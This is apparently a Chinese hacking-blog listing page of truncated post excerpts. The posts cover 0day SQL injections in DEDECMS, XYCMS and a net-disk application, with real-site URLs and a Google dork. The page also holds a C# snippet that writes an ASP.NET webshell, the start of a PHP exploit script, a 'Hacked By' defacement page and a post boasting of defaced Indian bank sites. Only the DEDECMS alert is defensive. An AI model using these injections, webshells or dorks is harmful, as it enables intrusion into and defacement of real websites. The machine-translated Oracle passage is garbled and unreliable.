我只是一个计算机技术爱好者，一个菜鸟

作者:灰太狼真男人
我们直接getshell用普通用户注册
http://www.mytaoyuan.com/a.txt
官网。。
因为不解析asp
so
其实代码就是
StreamWriter file1= File.CreateText(context.Server.MapPath(“../../fuck.txt”));
file1.Write(“<%@ Page Language=\” …

2012/4/29 凌晨知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day，官网目前提供下载的最新版5.7也受影响，截止本告警发出时官方尚未给出补丁或解决方案，此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。
知道创宇给出三种临时解决方案：
方案一、临时补丁，需要四步
1. 确保您的magic_quotes_gpc = On
详细开启方式：打开php安装目录中的php.i …

作者:Liuker
小菜之作 大牛勿笑
ps: 官方也存在漏洞未修补  不要乱搞
没事蛋疼审计代码
挖到两个 0day  都是桃园网盘的
一个getshell  一个注入
以下是注入0day
http://网站地址/myly.aspx?username=注册的用户名
 

BY:疯子(戈雅渗透小组)
XYCMS最新注入漏洞0day 月儿也挖到一个XYCMS 的0day
不过还没公布
通杀XYCMS企业建站系统PHP版
关键字：inurl:common.asp?id=
www.syscic.com/common.asp?id=16 注入漏洞，
有很多有防注入系统，如何突破我也不说了！
啊D 明小子之类跑不出 账号密码
需要使用Havij 婊段默认是admin_user …

作者:l泪少
(PS:是泪少自己叫我发我博客的 哈哈 )
这几天无聊 就看看这些站玩玩
第一步确实站 wwww.xxxx.tom.com
 
首先对服务器信息做一个大概的了解
211.100.XXX.XXX
web 版本 基于 apache
apache有解析漏洞 但是没有找到上传的地方跟没有漏洞一样
 
接下来扫下目录
扫过之后发现了config  跟temp   还有个后台 …

其实我想说句阿三也不是什么好货，经常骚扰我国边疆~ 不解释！

不明白的可以看看铁血网的连接  http://bbs.tiexue.net/post2_5761783_1.html
印度第三大银行被 EvilShadow 和谐   www.corpbank.com   www.csb.co.in
  …

<?php
$host=$argv[1];
$path=$argv[2];
$path=$path.”plus/car.php”;
$url=$path;
if(count($argv) < 3 ){
print_r(‘
Usage: php ‘.$argv[0].’ host path
Example:
php ‘.$argv[0].& …

<!–
____ _ _ ____ _____ _ _ ____ ___ ____ __ _ _
(_ _)( \( )( _ \( _ )( \( )( ___)/ __)(_ _) /__\ ( \( )
_)(_ ) ( )(_) ))(_)( ) ( )__) \__ \ _)(_ /(__)\ ) (
(____)(_)\_)(____/(_____)(_)\_)(__ …

<head>
<html>
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<title>Hacked By Liuker</title>
</head>
<body><link href=”http:// …

在本文的续篇，我描述了各种技术，利用SQL注入在一个针对Oracle后端的Web应用程序。当在利用Web SQL注入，请记住，甲骨文构成的各种挑战。最大的障碍之一是限制的SQL不允许执行多个语句的语句。本文通过探讨新SQL注入技术来执行多条语句。没有特殊权限需要使用这些技术和他们的工作Oracle数据库从Oracle 9i到11g R2的所有版本。 “
专门的文件概述了如何实现特权升级和操作系统代 …